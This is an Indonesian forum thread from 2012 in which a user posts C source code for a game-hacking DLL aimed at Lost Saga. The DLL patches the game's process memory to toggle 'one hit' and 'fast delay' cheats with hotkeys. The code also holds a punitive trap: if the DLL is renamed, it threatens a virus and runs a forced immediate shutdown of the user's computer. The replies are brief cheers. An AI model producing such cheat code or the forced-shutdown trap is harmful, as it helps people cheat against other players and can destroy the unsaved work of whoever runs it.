TeaM CSB
Would you like to react to this message? Create an account in a few clicks or log in to continue.


Tempat Share Cheat, Tips n Trik, Karya, Usaha dan lain - lain
 
IndeksPortalGalleryLatest imagesPencarianPendaftaranLogin
Pencarian
 
 

Display results as :
 
Rechercher Advanced Search
May 2024
MonTueWedThuFriSatSun
  12345
6789101112
13141516171819
20212223242526
2728293031  
CalendarCalendar

 

 Base Lost Saga 1Hit Dan Fast Dellay

Go down 
2 posters
PengirimMessage
CSB_Said
NewBie MAHO
NewBie MAHO



Jumlah posting : 2
Join date : 30.06.12

Base Lost Saga 1Hit Dan Fast Dellay Empty
PostSubyek: Base Lost Saga 1Hit Dan Fast Dellay   Base Lost Saga 1Hit Dan Fast Dellay EmptyMon Jul 16, 2012 5:43 pm

//===================================//
//Name : Ls New base Hack
//Created : Said Initial Amphibi
//Thanks : Anwar SB
//Notice : Jgn di sebar pliss buatny susah
//===================================//


#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

//============ OFFSET ============
#define OneHitCSD 0x //Cari Pke AOB
#define FastDelay 0x //Cari Pke AOB
//============ ------ ============

LPTSTR ModulGame = "lostsaga.exe"; //Targetnya

void Patch(void *adr, void *ptr, int size)

{

DWORD OldProtection;
VirtualProtect(adr,size,PAGE_EXECUTE_READWRITE, &OldProtection);
memcpy(adr,ptr,size);
VirtualProtect(adr,size,OldProtection, &OldProtection);
}
void WritePointer(unsigned long ulBase, int iOffset, int iValue)
{
if (!IsBadReadPtr((VOID*)ulBase, sizeof(unsigned long)))
{
if (!IsBadWritePtr((void*)(*(unsigned long*)ulBase + iOffset), sizeof(unsigned long)))
{
*(int*)(*(unsigned long*)ulBase + iOffset) = iValue;
}
}
}
void SaNzLavigne()
{
while(1)
{



//========== 1 Hit Crusade ==========//
if (GetAsyncKeyState(VK_F1)&1) { // On
MessageBeep(MB_ICONINFORMATION);
DWORD adrMin1, adrMin2 = 0;
DWORD dwPB = (DWORD)GetModuleHandleA("lostsaga.exe");
if (dwPB > 0) {
adrMin1 = dwPB + (DWORD)OneHitCSD;
Patch((void *)(adrMin1),(void*)(PBYTE)"\x00", 1); // Base Code
}
}

if (GetAsyncKeyState(VK_F2)&1) { // Off
MessageBeep(MB_ICONINFORMATION);
DWORD adrMin1, adrMin2 = 0;
DWORD dwPB = (DWORD)GetModuleHandleA("lostsaga.exe");
if (dwPB > 0) {
adrMin1 = dwPB + (DWORD)OneHitCSD;
Patch((void *)(adrMin1),(void*)(PBYTE)"\x4D", 1); // Base Code
}
}

//========== Fast Delay ==========//
if (GetAsyncKeyState(VK_F11)&1) { // Hotkey ON
MessageBeep(MB_ICONINFORMATION);
DWORD adrMin1, adrMin2 = 0;
DWORD dwPB = (DWORD)GetModuleHandleA("lostsaga.exe");
if (dwPB > 0) {
adrMin1 = dwPB + (DWORD)FastDelay;
Patch((void *)(adrMin1),(void*)(PBYTE)"\x68\x61\x73", 3); // Base Code
}
}

if (GetAsyncKeyState(VK_F12)&1) { // Hotkey OFF
MessageBeep(MB_ICONINFORMATION);
DWORD adrMin1, adrMin2 = 0;
DWORD dwPB = (DWORD)GetModuleHandleA("lostsaga.exe");
if (dwPB > 0) {
adrMin1 = dwPB + (DWORD)FastDelay;
Patch((void *)(adrMin1),(void*)(PBYTE)"\x6D\x61\x78", 3); // Base Code
}

}
}

Sleep(100); // Perintah jeda
}


BOOL APIENTRY DllMain(HINSTANCE hDll, DWORD callReason, LPVOID lpReserved) {

DisableThreadLibraryCalls(hDll);

if(callReason == DLL_PROCESS_ATTACH) {


MessageBox(0, "Created by Said Initial Amphibi \nGreeting From F2F\nThanks all people who help me", "||==== F2F = FaceInteraction ====||",MB_ICONINFORMATION | MB_OK); // Notice 1
MessageBox(0, "Hotkeys :\n[-_-] 1 Hit Crusade : F1 = ON | F2 = OFF\n[-_-] Fast Delay : F11 = ON | F12 = OFF\n\nTekan on pada saat Menyambung UDP dan offkan saat Puppeteer penuh ", "||==== F2F = FaceInteraction ====||",MB_ICONINFORMATION | MB_OK); // Notice 2

CreateThread(0, 0, (LPTHREAD_START_ROUTINE)&SaNzLavigne,0, 0, 0);

char strDLLName [_MAX_PATH];

GetModuleFileName(hDll, strDLLName , _MAX_PATH);

//-================= Edit sendiri agar tidak di Rename =========================-//
if (strstr(strDLLName, "LSNew.dll") <= 0) {//Nama DLL Asli
MessageBox(0, "File Di Rename","Error!!!!!!!!!",MB_ICONSTOP | MB_OK); // tampilkan pesan, kalo dll nya sdh di rename
MessageBox(0, "Ente Mo apain ni file","Error!!!!!!!!!",MB_ICONSTOP | MB_OK);
MessageBox(0, "Bye Computer anda w kasih virus !\nShutdown the computer","Error!!!!!!!!!",MB_ICONSTOP | MB_OK);
system("start C:/Windows/System32/shutdown.exe -s -f -t 00");
ExitProcess(0);//Error

}

}

}
Kembali Ke Atas Go down
Admin
MasTes TeaM CSB
MasTes TeaM CSB
Admin


Jumlah posting : 25
Join date : 30.06.12

Base Lost Saga 1Hit Dan Fast Dellay Empty
PostSubyek: Re: Base Lost Saga 1Hit Dan Fast Dellay   Base Lost Saga 1Hit Dan Fast Dellay EmptyMon Jul 16, 2012 9:12 pm

wew cheers cheers cheers
Kembali Ke Atas Go down
https://team-csb.indonesianforum.net
DevilRed
Tamu




Base Lost Saga 1Hit Dan Fast Dellay Empty
PostSubyek: Re: Base Lost Saga 1Hit Dan Fast Dellay   Base Lost Saga 1Hit Dan Fast Dellay EmptyThu Jul 19, 2012 5:35 pm

basenya bisa ?? Razz Razz lol! lol! lol! lol! lol! lol!
Kembali Ke Atas Go down
Sponsored content





Base Lost Saga 1Hit Dan Fast Dellay Empty
PostSubyek: Re: Base Lost Saga 1Hit Dan Fast Dellay   Base Lost Saga 1Hit Dan Fast Dellay Empty

Kembali Ke Atas Go down
 
Base Lost Saga 1Hit Dan Fast Dellay
Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» Sale Cheat Point blank or Lost Saga
» New Cheat PB 1Hit And Auto Headshot Terbaru 08 April 2013
» CHEAT PANGKAT+GCASH+MASMED+1HIT+WH 18 - 20 Agst 2013
» Cheat PB Point Blank WallHack 1Hit No baned 16-17 April 2014
» Cheat Point Blank VIP Auto Headshot WallHack 1HIT ANTI VK 16 S/D 30 APRIL 2014

Permissions in this forum:Anda tidak dapat menjawab topik
TeaM CSB :: Game Online & Offline :: Gemscool :: Lost Saga-
Navigasi: